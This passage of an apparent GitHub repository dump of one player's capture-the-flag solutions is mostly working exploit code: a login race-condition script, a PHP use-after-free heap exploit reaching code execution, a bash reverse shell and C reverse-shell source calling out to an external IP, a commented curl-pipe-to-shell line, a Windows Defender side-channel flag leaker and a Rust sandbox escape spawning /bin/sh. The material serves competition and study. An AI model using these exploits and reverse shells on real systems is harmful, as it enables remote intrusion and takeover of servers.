localhost:1234 28 | Connection: keep-alive 29 | Content-Length: {length} 30 | Cache-Control: max-age=0 31 | Cookie: session={session} 32 | Origin: http://triggered.pwni.ng:52856 33 | Upgrade-Insecure-Requests: 1 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 37 | Referer: http://triggered.pwni.ng:52856/login 38 | Accept-Encoding: gzip, deflate, br 39 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 40 | 41 | username={username}'''.replace('\n', '\r\n').format(session=session, username=data['username'], length=len('username=')+len(data['username']))) 42 | 43 | 44 | def go2(): 45 | global session, r2, data 46 | import requests 47 | 48 | cookies = { 49 | 'session': session, 50 | } 51 | 52 | headers = { 53 | 'Connection': 'keep-alive', 54 | 'Cache-Control': 'max-age=0', 55 | 'Origin': 'http://triggered.pwni.ng:52856', 56 | 'Upgrade-Insecure-Requests': '1', 57 | 'Content-Type': 'application/x-www-form-urlencoded', 58 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36', 59 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 60 | 'Referer': 'http://triggered.pwni.ng:52856/login', 61 | 'Accept-Encoding': 'gzip, deflate', 62 | 'Accept-Language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7', 63 | } 64 | 65 | data = { 66 | 'username': 'admin' 67 | } 68 | 69 | time.sleep(0.3) 70 | response = requests.post('http://triggered.pwni.ng:52856/login', headers=headers, cookies=cookies, data=data) 71 | print 'admin-response', response.content, response.history 72 | print '-----------------' 73 | 74 | 75 | go1() 76 | r1.interactive() 77 | 78 | 79 | import requests 80 | 81 | cookies = { 82 | 'session': session, 83 | } 84 | 85 | headers = { 86 | 'Connection': 'keep-alive', 87 | 'Cache-Control': 'max-age=0', 88 | 'Origin': 'http://triggered.pwni.ng:52856', 89 | 'Upgrade-Insecure-Requests': '1', 90 | 'Content-Type': 'application/x-www-form-urlencoded', 91 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36', 92 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 93 | 'Referer': 'http://triggered.pwni.ng:52856/login/password', 94 | 'Accept-Encoding': 'gzip, deflate', 95 | 'Accept-Language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7', 96 | } 97 | 98 | data = { 99 | 'password': data['password'] 100 | } 101 | 102 | thread.start_new_thread(go2, ()) 103 | response = requests.post('http://triggered.pwni.ng:52856/login/password', headers=headers, cookies=cookies, data=data) 104 | 105 | print response.history 106 | print response.content 107 | 108 | # thread.start_new_thread(go3, ()) 109 | 110 | # r2.interactive() 111 | -------------------------------------------------------------------------------- /2019/realworld/mop/drop.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | from pwn import * 3 | 4 | url = 'http://localhost:7989'; 5 | url = 'http://52.53.55.151:11514/'; 6 | 7 | payload_leak = ''' 8 | file_put_contents("/tmp/junobb.c", $_POST['code']); 9 | file_put_contents("/tmp/junox", $_POST['data']); 10 | 11 | chmod("/tmp/junox", 0777); 12 | // echo file_get_contents("/tmp/junox"); 13 | 14 | echo file_get_contents("/tmp/juno1234"); 15 | 16 | '''; 17 | 18 | yes = '''#!/bin/sh 19 | gcc -o /tmp/junobb /tmp/junobb.c 20 | ls -al /etc/passwd > /tmp/juno1234 21 | 22 | which gcc >> /tmp/juno1234 23 | ls -al /tmp/junobb >> /tmp/juno1234 24 | 25 | echo "1234" | /tmp/junobb >> /tmp/juno1234 26 | /bin/bash -i >& /dev/tcp/13.209.57.159/80 0>&1 27 | 28 | 29 | sleep 1; 30 | ''' 31 | 32 | yes2 = '''#include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | 45 | #define REMOTE_ADDR "13.209.57.159" 46 | #define REMOTE_PORT 80 47 | 48 | int main() 49 | { 50 | sigignore(SIGALRM); 51 | struct sockaddr_in sa; 52 | int s; 53 | 54 | sa.sin_family = AF_INET; 55 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 56 | sa.sin_port = htons(REMOTE_PORT); 57 | 58 | s = socket(AF_INET, SOCK_STREAM, 0); 59 | connect(s, (struct sockaddr *)&sa, sizeof(sa)); 60 | 61 | dup2(s, 0); 62 | dup2(s, 1); 63 | dup2(s, 2); 64 | execve("/readflag", 0, 0); 65 | // system("/readflag"); 66 | } 67 | ''' 68 | 69 | c = post(url, data={'rce': payload_leak, 'data': yes, 'code': yes2}, headers={'Content-Type': 'application/x-www-form-urlencoded'}); 70 | print c.text 71 | -------------------------------------------------------------------------------- /2019/realworld/mop/exp.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | from pwn import * 3 | 4 | url = 'http://localhost:7989'; 5 | url = 'http://52.53.55.151:11514/'; 6 | 7 | payload_leak = ''' 8 | $spec = "P2Y4DT6H8M"; 9 | $dllist = new SplDoublyLinkedList(); 10 | $dllist->push(new DateInterval($spec)); 11 | 12 | var_dump($dllist); 13 | var_dump($s = serialize($dllist)); 14 | 15 | var_dump($dllist->top()); 16 | $leak = $dllist->top()->y; 17 | 18 | printf("leak 0x%x\n", $leak); 19 | 20 | '''; 21 | 22 | 23 | c = post(url, data={'rce': payload_leak}, headers={'Content-Type': 'application/x-www-form-urlencoded'}, stream=True); 24 | heap_addr = int(c.text.split('leak ')[1].split('\n')[0], 16) 25 | print hex(heap_addr) 26 | 27 | payload_libc = ''' 28 | error_reporting(E_ALL); 29 | ini_set('display_errors', 1); 30 | function hex_dump($data, $newline="\n") 31 | { 32 | static $from = ''; 33 | static $to = ''; 34 | static $width = 16; # number of bytes per line 35 | static $pad = '.'; # padding for non-visible characters 36 | if ($from==='') 37 | { 38 | for ($i=0; $i<=0xFF; $i++) 39 | { 40 | $from .= chr($i); 41 | $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; 42 | } 43 | } 44 | $hex = str_split(bin2hex($data), $width*2); 45 | $chars = str_split(strtr($data, $from, $to), $width); 46 | $offset = 0; 47 | foreach ($hex as $i => $line) 48 | { 49 | echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; 50 | $offset += $width; 51 | } 52 | } 53 | // zval_ptr_dtor - use leak.php 54 | 55 | // 0x7ff31dc641c0 56 | $code_leak = 0x7FF327863FE0; 57 | 58 | // reserve valid heap chunks 59 | $arr = []; 60 | $arr[] = str_repeat("1", 23); 61 | $arr[] = str_repeat("2", 23); 62 | $arr[] = str_repeat("3", 23); 63 | $arr[] = str_repeat("4", 23); 64 | $arr[] = str_repeat("5", 23); 65 | $spec = "P2Y4DT6H8M"; 66 | $dllist = new SplDoublyLinkedList(); 67 | $dllist->push(new DateInterval($spec)); 68 | var_dump($dllist); 69 | var_dump($s = serialize($dllist)); 70 | var_dump($dllist->top()); 71 | $leak = $dllist->top()->y; 72 | var_dump("bp"); 73 | $dllist->top()->y -= 0x88; 74 | var_dump("bp"); 75 | $x = str_repeat("A", 23); 76 | var_dump($x); 77 | $y = str_repeat("B", 23); 78 | var_dump($y); 79 | // overwrite size of $x 80 | 81 | $z = pack("QQQ", 0x0000000600000002, 0, 0x100000000000); 82 | // now we have an overlap chunk - release valid chunks to prevent corrupted allocation 83 | unset($arr); 84 | 85 | $x_buf_addr = $leak-0x58; 86 | 87 | // hex_dump(substr($x, $code_leak - $x_buf_addr, 0x300)); 88 | hex_dump(substr($x, 0, 0x180)); 89 | 90 | ''' 91 | 92 | payload_libc = '''error_reporting(E_ALL); 93 | ini_set('display_errors', 1); 94 | function hex_dump($data, $newline="\\n") 95 | { 96 | static $from = ''; 97 | static $to = ''; 98 | static $width = 16; # number of bytes per line 99 | static $pad = '.'; # padding for non-visible characters 100 | if ($from==='') 101 | { 102 | for ($i=0; $i<=0xFF; $i++) 103 | { 104 | $from .= chr($i); 105 | $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; 106 | } 107 | } 108 | $hex = str_split(bin2hex($data), $width*2); 109 | $chars = str_split(strtr($data, $from, $to), $width); 110 | $offset = 0; 111 | foreach ($hex as $i => $line) 112 | { 113 | echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; 114 | $offset += $width; 115 | } 116 | } 117 | // reserve valid heap chunks 118 | $arr = []; 119 | $arr[] = str_repeat("1", 23); 120 | $arr[] = str_repeat("2", 23); 121 | $arr[] = str_repeat("3", 23); 122 | $arr[] = str_repeat("4", 23); 123 | $arr[] = str_repeat("5", 23); 124 | $spec = "P2Y4DT6H8M"; 125 | $dllist = new SplDoublyLinkedList(); 126 | $dllist->push(new DateInterval($spec)); 127 | var_dump($dllist); 128 | var_dump($s = serialize($dllist)); 129 | var_dump($dllist->top()); 130 | $leak = $dllist->top()->y; 131 | var_dump("bp"); 132 | $dllist->top()->y -= 0x88; 133 | var_dump("bp"); 134 | $x = str_repeat("A", 23); 135 | var_dump($x); 136 | $y = str_repeat("B", 23); 137 | var_dump($y); 138 | // overwrite size of $x 139 | $z = pack("QQQ", 0x0000000600000002, 0, 0x100000000000); 140 | // now we have an overlap chunk - release valid chunks to prevent corrupted allocation 141 | unset($arr); 142 | $x_buf_addr = $leak-0x58; 143 | // step 1 144 | // zval_ptr_dtor = 0x7FF327863FE0 145 | $leak_target = $x_buf_addr; 146 | $leak_size = 0x100; 147 | // step 2 148 | $code_leak = 0x7FF327863FE0; 149 | $leak_target = $code_leak + 0xa2caf0; 150 | $leak_size = 16; 151 | hex_dump(substr($x, $leak_target - $x_buf_addr, $leak_size));''' 152 | 153 | with post(url, data={'rce': payload_libc}, headers={'Content-Type': 'application/x-www-form-urlencoded'}) as c: 154 | print c.text 155 | 156 | 157 | target = heap_addr + 0xf8 - 0x20 158 | 159 | print 'target', hex(target) 160 | 161 | # system = heap_addr + 0xd000280 + (i << 12) 162 | 163 | system = 0x7ff32adea440 # remote 164 | system = 0x7ff32adea440 165 | # system = 0x7f6780467440 # local 166 | 167 | print hex(system) 168 | 169 | # 0x2a3d50 170 | 171 | # 0x7f6d23dae440 172 | payload_rce = ''' 173 | $spec = "P2Y4DT6H8M"; 174 | $dllist = new SplDoublyLinkedList(); 175 | $dllist->push(new DateInterval($spec)); 176 | 177 | var_dump($dllist); 178 | var_dump($s = serialize($dllist)); 179 | 180 | var_dump($dllist->top()); 181 | $leak = $dllist->top()->y; 182 | printf("leak: 0x%x\n", $leak); 183 | var_dump("bp"); 184 | 185 | // $dllist->top()->y -= 0x88; 186 | $dllist->top()->y -= (0x40 + 0x10 + 0x30 - 8); 187 | var_dump("bp"); 188 | 189 | // $x = str_repeat("A", 23); 190 | // 191 | 192 | $z = pack("QQQ", 0x41424344, 0x41424345, {}); 193 | 194 | // $y = str_repeat("B", 23); 195 | // $y= pack("QQQ", 0x61626364, 0x61626364, 0x61626364); 196 | $y = str_repeat("{}BBBBBBBBBBBBBBB", 1); 197 | var_dump($y); 198 | 199 | // $z = pack("QQQ", leak + 0x30, 0, 0x17); 200 | // $z = pack("QQQ", 0x41424344, 0x41424344, 0x41424344); 201 | // $z = str_repeat("\x1fcurl app.imjuno.com|sh", 1); 202 | $z = str_repeat("\x1f/tmp/junox;sleep 0 ", 1); 203 | var_dump($z); 204 | 205 | // var_dump($dllist); 206 | 207 | echo "trigger!!!\\n"; 208 | 209 | var_dump($dllist->top()->y); // trigger 210 | var_dump("bp"); 211 | 212 | 213 | '''.format(hex(target), repr(p64(system)).replace("'", '')) 214 | 215 | print payload_rce 216 | 217 | 218 | c = post(url, data={'rce': payload_rce}, headers={'Content-Type': 'application/x-www-form-urlencoded'}); 219 | print c.text 220 | -------------------------------------------------------------------------------- /2019/realworld/mop/readme.md: -------------------------------------------------------------------------------- 1 | # MoP 2 | 3 | - https://github.com/php/php-src/commit/9483c507725637a45704d5983f3eaf7ca37875c9 4 | - Simple UAF 5 | -------------------------------------------------------------------------------- /2020/confidence-pre/angry-defender.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | > The flag is everywhere. You just need to catch it. 4 | > 5 | > Hint: Javascript doesn't make Defender angry enough. 6 | 7 | # Analysis 8 | 9 | ```python 10 | SECRET = os.environ["FLAG"].encode("ascii") 11 | MAX_DATA_SIZE = 1024 * 1024 12 | CACHE_FOLDER = "c:\\storage" 13 | CACHE_SIZE = 256 14 | ``` 15 | 16 | - Constants tell us this application is running under windows system because the path has driver volume (`C:`) 17 | 18 | ```python 19 | @app.route("/cache", methods=["PUT"]) 20 | def put() -> str: 21 | data = request.data 22 | if MAX_DATA_SIZE < len(data): 23 | abort(403) 24 | id = uuid.uuid4() 25 | lru.write(id.hex, data + SECRET) 26 | return str(id) 27 | ``` 28 | 29 | - `cache` handler appends the flag after our input and just return the key of lru cache. 30 | 31 | 32 | ```python 33 | @app.route("/cache/", methods=["GET"]) 34 | def get(key: str) -> bytes: 35 | id = uuid.UUID(key) 36 | try: 37 | blob = lru.read(id.hex) 38 | except KeyError: 39 | abort(404) 40 | data = blob[: -len(SECRET)] 41 | if data + SECRET != blob: 42 | abort(500) 43 | return data 44 | ``` 45 | 46 | - and then we can compare a http status code to see if someone(ok, windows defender) changed or deleted our input (=file). 47 | - It's another version of icchy's [slide](https://speakerdeck.com/icchy/lets-make-windows-defender-angry-antivirus-can-be-an-oracle). 48 | - Unfortunately, we cannot add trailing bytes after the flag, it means, we cannot make a valid string token. 49 | 50 | # Exploitation 51 | 52 | **Windows Defender's Emulator is AWESOME** 53 | 54 | - According to Alexi's [slide](https://i.blackhat.com/us-18/Thu-August-9/us-18-Bulazel-Windows-Offender-Reverse-Engineering-Windows-Defenders-Antivirus-Emulator.pdf), windows defender also emulates a PE format exe. 55 | - `MAX_DATA_SIZE` is < 1MB, we had to make a tiny PE file and would allow the flag to be recongnized as code(or attach to a memory). 56 | - The first try is [http://www.phreedom.org/research/tinype/](http://www.phreedom.org/research/tinype/). 57 | 58 | ![./images/1.png](./images/1.png) 59 | 60 | - good, 61 | - we searched a lot on google but we could not find any way to an emulator to detect as virus. 62 | - soon, I remember that rpisec is doing an malware traning course [https://github.com/RPISEC/Malware](https://github.com/RPISEC/Malware). their hacking skills are nice (as far as i know), so they have a tiny pe with malware sample? (I know that this was not a logical thinking. Yes I was lucky XD) 63 | - after downloading a lecture 4, windows defender detected it as a malware. and then I added a '\xcc' (int 0x3) to the first code offset (0x200), surprisingly windows defender did not detect as a malware. 64 | 65 | ```python 66 | #!/usr/bin/env python2 67 | # flag: p4{c4n_y0u_pr1n7_73n5h4-h0_w17h0u7_b07h_h4nd5?} 68 | import requests 69 | import time 70 | import string 71 | 72 | # 31 C0 83 F8 01 EB 01 90 90 CC CC 73 | a = open('juno.exe', 'rb').read() # is inside a same directory. 74 | 75 | b = a[:512] 76 | c = a[512:] 77 | 78 | from pwn import * 79 | 80 | import string 81 | 82 | def gogo(index, t): 83 | payload = asm((''' 84 | call a 85 | a: 86 | pop ebx 87 | add ebx, %d 88 | xor eax, eax 89 | mov al, byte ptr [ebx] 90 | cmp al, {what} 91 | jz b 92 | int 0x3 93 | b: 94 | ''' % (len(c) + 0x10 + index)).format(what=ord(t))) 95 | 96 | a = b + payload + c 97 | 98 | tmpkey = requests.put('http://angry-defender.zajebistyc.tf/cache', data=a).text 99 | res = requests.get('http://angry-defender.zajebistyc.tf/cache/{tmpkey}'.format(tmpkey=tmpkey)) 100 | if res.status_code == 500: 101 | print 'wtf[%d]="%s"' % (index, t) 102 | 103 | 104 | index = 0 105 | 106 | import sys 107 | 108 | 109 | # for i in xrange(36, 40): 110 | for t in string.printable: 111 | t = threading.Thread(target=gogo, args=(int(sys.argv[1]), t)) 112 | # t = threading.Thread(target=gogo, args=(i, t)) 113 | t.start() 114 | 115 | a = raw_input() 116 | ``` 117 | -------------------------------------------------------------------------------- /2020/confidence-pre/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2020/confidence-pre/images/1.png -------------------------------------------------------------------------------- /2020/confidence-pre/juno.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2020/confidence-pre/juno.exe -------------------------------------------------------------------------------- /2020/confidence-pre/two-sandbox-challs.md: -------------------------------------------------------------------------------- 1 | - one line writeup: I do not understand why we can override `unsafe_code` option, from forbid to allow. 2 | 3 | ```rust 4 | #![allow(unsafe_code)] 5 | pub fn main() { 6 | let x = "/bin/sh\x00"; 7 | let buf = x.as_bytes(); 8 | let ret: isize; 9 | unsafe { 10 | asm!("syscall" 11 | : "={rax}"(ret) 12 | : "{rax}"(59), "{rsi}"(0), "{rdi}"(buf.as_ptr()), "{rdx}"(0) 13 | : "rcx","r11","memory" 14 | : "volatile"); 15 | } 16 | 17 | } 18 | ``` 19 | -------------------------------------------------------------------------------- /2021/defcon/readme.md: -------------------------------------------------------------------------------- 1 | # defcon 29 2 | 3 | - [coooinbase](./coooinbase) 4 | - [coooinbase-kernel](./coooinbase-kernel) 5 | - [exploit-for-dummies](./exploit-for-dummies) 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hello, I'm Juno! 2 | 3 | 4 | -------------------------------------------------------------------------------- /WhiteHat Grand Prix 06 - KingTigerPrawn - Write Up.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/WhiteHat Grand Prix 06 - KingTigerPrawn - Write Up.pdf --------------------------------------------------------------------------------